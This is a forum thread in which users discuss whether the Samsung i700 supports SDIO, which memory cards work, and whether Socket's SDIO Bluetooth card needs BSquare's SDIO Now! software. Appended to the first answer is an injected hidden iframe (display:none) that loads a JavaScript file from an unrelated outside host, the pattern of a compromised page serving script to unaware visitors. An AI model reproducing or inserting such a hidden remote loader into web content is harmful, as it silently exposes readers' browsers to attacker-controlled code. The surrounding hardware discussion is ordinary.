+ Reply to Thread
    Editor and Site Administrator Convergent's Avatar

Does the Samsung i700 support SDIO?

Yes, the i700 supports SDIO, but you need drivers to support the SDIO card that you intend to use. No drivers are required to support SD/MMC memory cards, just for the IO cards like WiFi for example. The Socket SD/IO Bluetooth Card does work in the i700.

The whole SDIO driver thing is a bit of a mess from what I've heard. This Brighthand Article explains the problem HERE. The good news is that this article reports that the Samsung i700 supports BSquare's SDIO NOW! program that is designed to standardize SDIO drivers, so I would say its very likely that we'll see an 802.11B card for this device.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Mike - Been Converged?

updated Socket Bluetooth info.
    Mike - Been Converged?

Redskins fan
    What kinds (or brands) of cards work with the i700 and how can I buy them for memory expansion? I understand what you mean about drivers for Wi-Fi and other apps, but I'm just looking for more storage, and I'm not sure what to buy. Thanks.

Any SD or MMC memory card should work. SanDisk is a popular brand of memory card, but they all should work. That said, I have heard of people with cards that would not work.. my only conclusion is that those cards must be defective since other people with the same card have reported success. I have testd a SanDisk 256MB card and it worked fine.
    Mike - Been Converged?

So will bluetooth work?

Forgive the dumb question, but I'd like to make Bluetooth work on an i700 and I'd hate to spend a few hundred bucks to find out that it doesn't.&lt;g&gt;

Clearly I need SDIO Now! to make cards like bluetooth cards to work. Can I buy it? The Bsquare site seems only to cater to OEMs. Which bluetooth cards work?

Once I have Bluetooth working, can a Bluetooth-equipped laptop use the phone as a 1XRTT Internet gateway?

Thanks in advance.

Socket makes an SDIO Bluetooth card that is sold at Bottom Line Telecommunications, shopblt.com, and other stores.
    -s

Thanks for that info, but every Web site that I can find that refers to the card says the same thing (clearly cribbed from the manufacturer's site) -- that this

The card works in devices running BSQUARE Corporation's SDIO Now! software, ensuring compatibility with devices via this standard.
    The problem is that the BSQUARE site seems to say that I can't buy it, as they only sell to OEMs. This makes sense because of the number of different processor architectures in the CE world.

I don't see anywhere in the Samsung or Verizon literature that the i700 comes with SDIO Now! software, and the Socket page does not mention the Samsung, hence my earlier questions -- (1) does this Socket device work with the Samsung, (2) will it require that I buy SDIO Now!, and if so, where would I do it?

Forgive me if I'm being dense, I'm just hoping that someone has actually purchased this and made it work. Many thanks!